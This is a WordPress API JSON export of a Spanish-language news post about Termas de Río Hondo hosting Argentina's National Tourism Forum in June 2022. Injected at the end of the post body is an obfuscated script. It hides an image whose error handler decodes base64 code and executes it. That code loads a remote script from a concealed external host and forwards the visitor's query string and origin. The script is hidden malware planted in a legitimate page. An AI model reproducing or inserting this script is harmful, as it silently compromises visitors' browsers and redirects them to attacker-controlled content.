{"id":5329,"date":"2022-05-31T11:19:40","date_gmt":"2022-05-31T14:19:40","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5329"},"modified":"2025-08-13T16:19:23","modified_gmt":"2025-08-13T19:19:23","slug":"reconvertida-en-su-oferta-turistica-termas-de-rio-hondo-recibira-el-foro-nacional-de-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5329","title":{"rendered":"Reconvertida en su oferta tur\u00edstica, Termas de R\u00edo Hondo recibir\u00e1 el Foro Nacional de Turismo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/termatalia-2022\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-1024x72.jpeg\" alt=\"\" class=\"wp-image-5325\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-2.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#62031b\">El encuentro se desarrollar\u00e1 entre el 15 y el 17 de junio y tendr\u00e1 por lema \u00abRespetar al turismo de manera sostenible\u00bb.\u00a0<\/h3>\n\n\n\n<p>La secretaria de Turismo, Cultura y Deportes de Termas de R\u00edo Hondo, Vilma D\u00edaz, asegur\u00f3 este lunes que&nbsp;<strong>esa ciudad santiague\u00f1a, que reunir\u00e1 el Foro Nacional de Turismo del 15 al 17 de junio<\/strong>, \u00abha tenido una reconversi\u00f3n en su propuesta, con diversos productos tur\u00edsticos que se han sumado a la oferta tradicional\u00bb.<\/p>\n\n\n\n<p>Respecto del encuentro, que hace 5 a\u00f1os no se realiza y que en esta edici\u00f3n llevar\u00e1 la consigna \u00abRespetar al turismo de manera sostenible\u00bb, la funcionaria dijo a T\u00e9lam Radio que \u00abera un orgullo que hayan elegido nuestra ciudad\u00bb.<\/p>\n\n\n\n<p>D\u00edaz se\u00f1al\u00f3 que \u00abse viene trabajando hace tiempo con la comisi\u00f3n organizadora para tener una convocatoria nacional importante en el Centro Cultural General San Mart\u00edn, que lo administra la Municipalidad\u00bb.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>\u00abHemos segmentado, gente que viene por el turismo de bienestar, el termalismo, sumamos el turismo deportivo que se complementa con nuestra oferta: Turismo Carretera y otras competencias en nuestro aut\u00f3dromo, Moto GP\u00bb.<\/p><cite>Vilma D\u00edaz, secretaria de Turismo de R\u00edo Hondo<\/cite><\/blockquote>\n\n\n\n<p>Asimismo, hizo eje en la \u00abatractiva agenda de actividades\u00bb que configura la cita y ponder\u00f3 la decisi\u00f3n pol\u00edtica del gobernador Gerardo Zamora, las gestiones ante el Consejo Federal de Inversiones (CFI) del subsecretario de Turismo provincial, Nelson Bravo, y el aporte espec\u00edfico de la Municipalidad.<\/p>\n\n\n\n<p>Por otra parte, la secretaria afirm\u00f3 que&nbsp;<strong>\u00abtodos los buenos resultados hacen que hoy Termas tenga una perspectiva diferente, una valoraci\u00f3n diferente a nivel nacional, porque es uno de los destinos que m\u00e1s se ha desarrollado\u00bb.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-soundcloud wp-block-embed-soundcloud\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Termas de R\u00edo Hondo, reconvertida y vital, se apresta a recibir al Foro Nacional de Turismo by Audio\" width=\"640\" height=\"400\" scrolling=\"no\" frameborder=\"no\" src=\"https:\/\/w.soundcloud.com\/player\/?visual=true&#038;url=https%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F1277853283&#038;show_artwork=true&#038;maxheight=960&#038;maxwidth=640\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Termas ha tenido una reconversi\u00f3n en su propuesta, con diversos productos tur\u00edsticos que se han sumado a la oferta tradicional, y esto hace que sea un destino que ha podido romper con ese preconcepto que hab\u00eda sobre nuestra ciudad, y es algo que tambi\u00e9n repercute en nuestra actividad, \u00fanica actividad econ\u00f3mica, el turismo\u00bb, se explay\u00f3.<\/p>\n\n\n\n<p>D\u00edaz puso en valor la&nbsp;<strong>interacci\u00f3n tur\u00edstica, deportiva y cultural que ampliaron la potencialidad de la ciudad<\/strong>, que cuenta con 12.500 plazas hoteleras, ubicada a pocos m\u00e1s de 70 kil\u00f3metro de Santiago del Estero capital.<\/p>\n\n\n\n<p><strong>\u00abLa recuperaci\u00f3n de una fecha de la competencia de Moto GP&nbsp;<\/strong>para nuestro pa\u00eds era un desaf\u00edo nuevo despu\u00e9s de 2 a\u00f1os de pandemia y salimos muy bien, ha sido un evento que ha tenido una repercusi\u00f3n mundial y en t\u00e9rminos econ\u00f3micos ha beneficiado no s\u00f3lo a Termas sino tambi\u00e9n a todo el norte argentino\u00bb, relat\u00f3.<\/p>\n\n\n\n<p>Agreg\u00f3 que \u00abde tener una temporalidad de 4 meses\u00bb hoy la ciudad cuenta con&nbsp;<strong>\u00abcasi 12 con presencia de turistas\u00bb&nbsp;<\/strong>y se\u00f1al\u00f3 que por esa raz\u00f3n fueron segmentando los per\u00edodos del a\u00f1o.<\/p>\n\n\n\n<p><strong>\u00abHemos segmentado, gente que viene por el turismo de bienestar, el termalismo, sumamos el turismo deportivo que se complementa con nuestra oferta: Turismo Carretera y otras competencias en nuestro aut\u00f3dromo, Moto GP\u00bb<\/strong>, rese\u00f1\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202205\/594054-foro-nacional-turismo-termas-rio-hondo.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg\" alt=\"\" class=\"wp-image-5235\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg 964w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-768x76.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El encuentro se desarrollar\u00e1 entre el 15 y el 17 de junio y tendr\u00e1 por lema \u00abRespetar al turismo de manera sostenible\u00bb.\u00a0 La secretaria de Turismo, Cultura y Deportes de Termas de R\u00edo Hondo, Vilma D\u00edaz, asegur\u00f3 este lunes que&nbsp;esa ciudad santiague\u00f1a, que reunir\u00e1 el Foro Nacional de Turismo del 15 al 17 de junio, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5330,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22],"tags":[],"class_list":["post-5329","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5329"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5329\/revisions"}],"predecessor-version":[{"id":10666,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5329\/revisions\/10666"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5330"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}